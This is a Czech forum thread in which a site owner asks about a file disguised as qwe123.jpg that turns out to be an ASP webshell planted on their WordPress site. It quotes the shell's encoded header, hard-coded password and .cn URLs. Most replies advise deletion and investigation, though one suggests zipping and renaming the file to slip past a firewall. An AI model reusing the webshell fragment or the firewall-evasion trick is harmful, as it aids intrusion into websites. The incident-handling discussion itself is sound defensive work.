virus v obrázku? - poradna.net

Může být virus/breberka v souboru jpg?

Mám už delší dobu soubor s názvem qwe123.jpg. Teď, když jsem napsal ten název, tak je nějaké divný.
A virustotal mi tvrdí, že je tento soubor zavirovaný - viz obr.

Poklepat na něj v pc jsem neměl odvahu.

Když ho chci v totalcommnderu editovat jako tex, tak začátek je:

<%@ LANGUAGE = VBScript.Encode %>
<%
UserPass="xiaofei" 'ĂÜÂë
'--------------------------------------------------------------------
mNametitle ="ÄäĂűŐßşÚżÍÖŐĽ«°ć" ' ±ęĚâ
Copyright="Anonymous" '°ćČ¨
SItEuRl="http://www.7jyewu.cn/" 'ÄăµÄÍřŐľ
bg ="http://www.7jyewu.cn/webshell/Anonymous.jpg" '±łľ°ÍĽĆ¬,˛»ĘąÓĂÁôżŐ
ysjb=true '
'--------------------------------------------------------------------
'
' ŇÔĎÂ´úÂëŇŃľĽÓĂÜ´¦ŔíŁ¬Ëć±ăĐŢ¸Ä»áµĽÖÂ´óÂí˛»żÉŇÔĘąÓĂˇŁ
'

qwe123.jpg 155.66 KiB

Předmět	Autor	Datum
Takže je to asi jasné. Ten soubor je na webu a musím zjistit, kde se tam vzal. Pokud dám celý web do… Nol 18.02.2019 16:57	Nol	18.02.2019 16:57
Slabé heslo v TC nebo v administraci webu? Škodná v PC? IQ37 18.02.2019 20:28	IQ37	18.02.2019 20:28
Extenze jpg nezaručuje, že jde skutečně o obrázek. Vymaž ho a hotovo. Co řešíš? Kyncl 18.02.2019 17:21	Kyncl	18.02.2019 17:21
Však súbor dekompiluj nech vidíš strojový kód. Zrejem nejaký VBjava script s príkazom na spustenie n… Nuda 18.02.2019 20:46	Nuda	18.02.2019 20:46
Však súbor dekompiluj nech vidíš strojový kód. ::):-D To jsem netušil, že se strojový kód získává d… Wikan 18.02.2019 20:50	Wikan	18.02.2019 20:50
Když lze něco kompilovat, tak to jde i dekompilovat. My, co pamatujeme osmibitové Atari, jsme se pot… IQ37 19.02.2019 18:37	IQ37	19.02.2019 18:37
Problém nebyl ve slovech dekompilovat a strojový. Nesmyslné bylo jejich spojení. Programy se kompilu… Wikan 19.02.2019 19:11	Wikan	19.02.2019 19:11
Aha, já jsem to posuzoval podle těch boldovských písmen. Taky jsem Ataroval, ale já si z toho strojá… IQ37 19.02.2019 21:43	IQ37	19.02.2019 21:43
https://www.root.cz/zpravicky/android-je-mozne-napadnout-pomoci-obrazku-png/ Jan Fiala 18.02.2019 21:10	Jan Fiala	18.02.2019 21:10
oba tvé odkazy mají příponu .cn - to je v asii, stejně jako rusko, prdel, a další podobný odpad. něj… lední brtník 18.02.2019 21:52	lední brtník	18.02.2019 21:52
Delší dobu máš soubor s podivným názvem,který se bojíš otevřít,tak na co si ho šetříš?Jak radí Kyncl… Karel04 18.02.2019 23:00	Karel04	18.02.2019 23:00
Kde jsi k tomu souboru přišel? Potřebuješ ho? Není náhodou celý jeho název qwe123.jpg.com nebo tak n… Yarda 19.02.2019 08:47	Yarda	19.02.2019 08:47
Ahoj, díky za rady. Na ten soubor mě upozornil včera 1 plugin. A našel jsem ho i v zálohách webu. V… Nol 19.02.2019 08:56	Nol	19.02.2019 08:56
Yarda: opravdu se jmenuje qwe123.jpg. Koukal jsem na to v TotalCommanderu. Nol 19.02.2019 08:57	Nol	19.02.2019 08:57
Pokud ho nechceš rovnou smazat, napadá mne finta: Soubor přejmenuj (dej mu třeba koncovku RUM, abys… Yarda 19.02.2019 09:42	Yarda	19.02.2019 09:42
opravdu se jmenuje qwe123.jpg hehe, conficker blahé paměti se šířil jako údajný obrázek. dívám se d… poslední lední brtník 19.02.2019 23:18	lední brtník	19.02.2019 23:18
důležité je, KDE je ten soubor a jak se tam dostal a CO ho používá. Je nad slunce jasné, že Obrázek… penoncy 19.02.2019 18:04	penoncy	19.02.2019 18:04
A co mu má přistát před očima, když soubor přejmenuje? Přiznání Zemana nebo Zjevení jehovo? Aby se d… penoncy 19.02.2019 18:06	penoncy	19.02.2019 18:06

Takže je to asi jasné.
Ten soubor je na webu a musím zjistit, kde se tam vzal. Pokud dám celý web do virustotal.com, tak se tváří, že je v pořádku.

Slabé heslo v TC nebo v administraci webu? Škodná v PC?

Extenze jpg nezaručuje, že jde skutečně o obrázek. Vymaž ho a hotovo. Co řešíš?

Však súbor dekompiluj nech vidíš strojový kód. Zrejem nejaký VBjava script s príkazom na spustenie niečoho....

Alebo ho (*.jpg)zaves na Letecná pošta, daj sem link na stiahnutie. Ak sa bude server brániť, zazipuj ho a zipku (rar) archív, ako bonus premenuj s príponou *.gif. Takto by ho mal firewall pustiť.

Však súbor dekompiluj nech vidíš strojový kód.

To jsem netušil, že se strojový kód získává dekompilací.

Když lze něco kompilovat, tak to jde i dekompilovat.
My, co pamatujeme osmibitové Atari, jsme se potkali i se strojovým kódem...

strojový kód kompilace
strojový kód dekompilace

Problém nebyl ve slovech dekompilovat a strojový. Nesmyslné bylo jejich spojení.
Programy se kompilují ze zdrojového do strojového kódu (případně nějakého byte kódu).
Nebo se mohou dekompilovat opačným směrem.

Rozhodně se ale nemůžou dekompilovat do strojového kódu.

A Atari si pamatuju taky i v jeho strojovém kódu jsem něco menšího napsal.

Aha, já jsem to posuzoval podle těch boldovských písmen.
Taky jsem Ataroval, ale já si z toho strojáku už nepamatuju ani ň.

https://www.root.cz/zpravicky/android-je-mozne-napadnout-pomoci-obrazku-png/

oba tvé odkazy mají příponu .cn - to je v asii, stejně jako rusko, prdel, a další podobný odpad.
nějak nechápu tvoji touhu zavléct si takový humus do pc. čili nespouštět.

jedna technická: jestli to máš stažené v pc a čeká to na první děcko, co na to klikne, se nediv. je po tobě.

edit:
viz kyncl vejš.

Delší dobu máš soubor s podivným názvem,který se bojíš otevřít,tak na co si ho šetříš?Jak radí Kyncl-smaž ho a hned můžeš klidněji spát a dýchat.

Kde jsi k tomu souboru přišel? Potřebuješ ho? Není náhodou celý jeho název qwe123.jpg.com nebo tak nějak?

Ahoj,

díky za rady.
Na ten soubor mě upozornil včera 1 plugin. A našel jsem ho i v zálohách webu. V říjnu 2017 tam nebyl a 10.1.2018 už tam byl. Na web máme přístup 2 lidi. Snažím se přijít na to, jak se tam ten soubor dostal. Oba máme dlouhé a složité heslo a není uloženo nikde v prohlížeči. I přesto, že tam soubor je, virustotal.com označí web jako bezpečný. Po zkopírování souboru jej Eset označí jako čistý. Přesto podle struktury je to něco spustitelného. Takže bych rád věděl, zda se to tam mohlo dostat s nějakým pluginem nebo aktualizací WordPressu.

Yarda: opravdu se jmenuje qwe123.jpg. Koukal jsem na to v TotalCommanderu.

Pokud ho nechceš rovnou smazat, napadá mne finta: Soubor přejmenuj (dej mu třeba koncovku RUM, abys ho pak mohl snadněji najít) a přesuň někam jinam. Do toho adresáře nakopíruj obrázek JPG přibližně stejné velikosti a přejmenuj na qwe123.jpg. A uvidíš, co se bude dít - jestli se ti objeví nějaká chybová hláška.
Možná ten soubor, pokud je nějaký podezřelý, nepůjde ani přejmenovat ani přesunout.
Máš tam datum, kdy se u tebe ten soubor objevil?

BTW: Připomněl jsem si epizodu z knihy "Marťan" - do kosmické lodi bylo potřeba poslat nějaké pokyny ke změně dráhy, aby o tom nevědělo řídicí středisko. Tak to bylo provedeno tak, že textový soubor s pokyny byl přejmenován na JPG a byl poslaný jako obrázková příloha e-mailu.

opravdu se jmenuje qwe123.jpg

hehe, conficker blahé paměti se šířil jako údajný obrázek. dívám se do staré batky pro automatickou likvidaci, čistila taky ie cache od "obrázků" = přejmenovaných virů.

důležité je, KDE je ten soubor a jak se tam dostal a CO ho používá.

Je nad slunce jasné, že Obrázek TO NENÍ, ale skript, který má příponu jpg, jak správně píšeš, ale klidně by to mohl být avi soubor a tak dále až do pochopení.

A co mu má přistát před očima, když soubor přejmenuje? Přiznání Zemana nebo Zjevení jehovo? Aby se dočkal vůbec.

Zpět do poradny Odpovědět na původní otázku Nahoru